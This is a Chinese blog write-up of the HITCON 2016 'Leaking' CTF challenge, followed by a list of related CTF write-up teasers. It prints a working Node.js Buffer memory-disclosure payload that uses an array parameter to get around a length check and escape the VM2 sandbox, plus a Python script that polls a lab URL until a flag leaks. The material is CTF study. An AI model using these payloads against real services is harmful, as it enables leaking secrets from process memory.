[HITCON 2016]Leaking 记录

最新推荐文章于 2022-04-08 19:52:00 发布
最新推荐文章于 2022-04-08 19:52:00 发布
阅读量869 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/108963957
版权
这篇博客探讨了Node.js应用的安全性,特别是关于低版本Node.js中使用`buffer()`查看内存的漏洞。作者分享了一个利用VM2执行的payload,该payload用于不断尝试直到找到包含'flag{'的内存块,从而揭示潜在的flag。博客还提供了一个Python exploit示例,通过不断发送请求来检测回显中的flag。
摘要由CSDN通过智能技术生成

在这里插入图片描述

node.js 代码审计
⑧太懂node.js
他是用VM2来执行的
在这里插入图片描述
可知buffer

在这里插入图片描述
emmm,搜着搜着wp搜出来了
相关wp

低版本的node可以使用buffer()来查看内存,只要调用过的变量,都会存在内存中,那么我们可以构造paylaod读取内存

相关资料
这我也看不懂。。。。。emmmm
在这里插入图片描述
记得用数组来绕这个长度限制

payload(这个payload在buu无效)

?data[]=for (var step = 0; step < 100000; step++) {var buf = (new Buffer(100)).toString('ascii');if (buf.indexOf("hitcon{") !== -1) {break;}}buf;

他这个payload大致就是一直执行然后当回显出flag的时候退出并返回
是在buu做的,记得改下flag

exp

import requests
import time
url = 'http://19a931b5-2f8a-42c4-b400-20ba417d6a4f.node3.buuoj.cn/?data=Buffer(500)'

while True:
        r = requests.get(url)

        time.sleep(0.1)
        print('trying')
        if 'flag{' in r.text:
            print(r.text)
            break
penson by 小乌
关注
houseoforange_hitcon_2016
fayinq的博客
04-07 287
houseoforange_hitcon_2016 先检查保护 保护全开 FSOP:对于_IO_FILE_plus结构体的利用 首先,在分析这个题目之前,我们需要知道两个知识点,一个是_IO_FILE_plus,一个是FSOP _IO_FILE_PLUS _IO_FILE_plus是ptmalloc中定义的一种结构体,他决定了很多东西,先在gdb里面查看一眼 在此,我们就用本次题目中会使用到的_IO_list_all结构体来作为参考。 _IO_FILE_plus 主要是由两个部分组成,其中一个是_IO
HITCON 2016——PHP反序列化漏洞
qq_41560595的博客
09-18 399
PHP反序列化漏洞典型例题
[HITCON 2016]Leaking node.js沙箱逃逸
a3320315的博客
02-08 2000
0x01 源码 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("...
[HITCON 2016]Leaking
fmyyy1的博客
05-25 336
"use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.get("/", function(req, res) { res.he
[HITCON 2016]Leaking沙箱逃逸学习
Y4tacker的博客
02-23 833
[HITCON 2016]Leaking沙箱逃逸学习 node.js 里提供了 vm 模块,相当于一个虚拟机,可以让你在执行代码时候隔离当前的执行环境,避免被恶意代码攻击。但是这道题比较有意思 考点是: node.js中VM2沙箱逃逸 JS通过Buffer 类处理二进制数据的缓冲区 首先给出了题目的源码 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var {
BUUCTF [HITCON 2016] Leaking
Senimo
01-15 824
BUUCTF [HITCON 2016] Leaking 考点: 启动环境: "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.g
[HITCON 2016]Leaking-nodejsVM沙箱逃逸
cjdgg的博客
08-19 688
[HITCON 2016]Leaking 最近想学下nodejs相关的题目,所以去buu上又找了一道来做 进入题目后如上图所示,直接给出了源代码,老样子,拿出之前收藏的nodejs相关安全问题来对比着看看,我发现这里用了VM沙箱,那最有可能考的就是VM逃逸了 emem由于之前没做过,说实话,光看这个完全不知道该怎么做,还是老实找个大佬的WP来看看吧 那我们先来分析下代码,下面这段代码是整道题的核心 /* Orange is so kind so he put the flag here. But
houseoforange_hitcon_2016(House of orange, unsorted bin attack,FSOP)
weixin_44145820的博客
04-27 1599
目录题目分析漏洞利用Exp 题目分析 只有添加,显示,编辑三个功能,没有删除 添加函数,最多只能添加四次,每次添加会依次执行malloc(0x10),malloc(name_size),calloc(8) House结构体如下 在编辑函数中,可以进行堆溢出,因为House没有把name的size保存下来 编辑次数最多为3 漏洞利用 Exp ...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
Uskin皮肤
09-16
免费的Uskin皮肤
XCTF Leaking
m0_64898960的博客
04-08 1610
[HITCON2016]Leaking
BUUCTF--[HITCON 2016]Leaking
qq_46263951的博客
08-13 277
进入页面后给出代码 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.get("/", function(req, res).
xctf攻防世界Leaking wp
sash1mi
01-15 1707
访问题目地址 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.get("/", function(req, res) { .
还原HITCON 2016一道web题(php反序列化漏洞)
洞若观火
07-27 3331
实验环境搭建:PHPstudy,火狐(backbar),notepad++; 原题目代码:https://github.com/orangetw/My-CTF-Web-Challenges/tree/master/hitcon-ctf-2016/babytrick 本人在还原此题目时,因为mysql数据库用户名密码和方便调试等原因对源码的一些参数做了一些相应的改动,但是没有改变主要代码。 c...
Kaggle Learn 数据泄露(data leakage)的几个例子
zhang35的博客
03-08 1436
数据泄露 数据泄露是指,在训练数据中包含目标信息,但在预测时没有可用的类似数据。这会使得训练数据(或者验证数据)效果比较好,但实际生产(预测)时效果特别差。 有两种泄露类型:target leakage(目标泄露) 和 train-test contamination(训练测试污染) 当测试集上的预测结果准确率特别高,比如95%以上时,要检查一下是否数据泄露了。 target leakage 预测包含未来才知道的数据时,会发生目标泄露。 train-test contamination 比如在切分训练集
Dragonblood: Data-leaking flaw in WPA3 Wi-Fi authentication
davidchang365的专栏
05-29 212
上个月,国外安全研究人员发现了WPA3的一组漏洞。WPA3是用来替代WPA2的,虽然还需要几年来部署,但这么快就被发现了严重漏洞,也是太意外了。 这些漏洞有多严重呢?采用WPA3保护的无线网络,几乎不可能被破解出密码的。但研究报告揭示,在一定的程度上,WIFI密码依然能被破解。特别是针对支持过渡功能的设备。 根据研究报告,可进行的攻击包括:安全组降级攻击,边信道攻击,拒绝服务攻击,降级&amp...
史上最白话解释什么是数据泄露(Data Leakage)
憨憨的博客
10-15 1525
数据中存在倒“因”为“果”的feature的现象,叫数据竞赛中的Data Leakage。 比如预测一个人是否学习好: 有没有npy 是否得奖学金 是否学习好 1 1 1 0 1 1 1 0 0 是否得奖学金而更像是一个标记,是学习好的“果”,根据这样的feature训练出来的模型,肯定能够得到很好的预测结果,但对实际了解是否学习好,没有一点帮助。 ...
[hitcon 2017]ssrfme 1
最新发布
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。此题的目标是通过一个输入参数包含的URL,探测出内部的flag并输出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值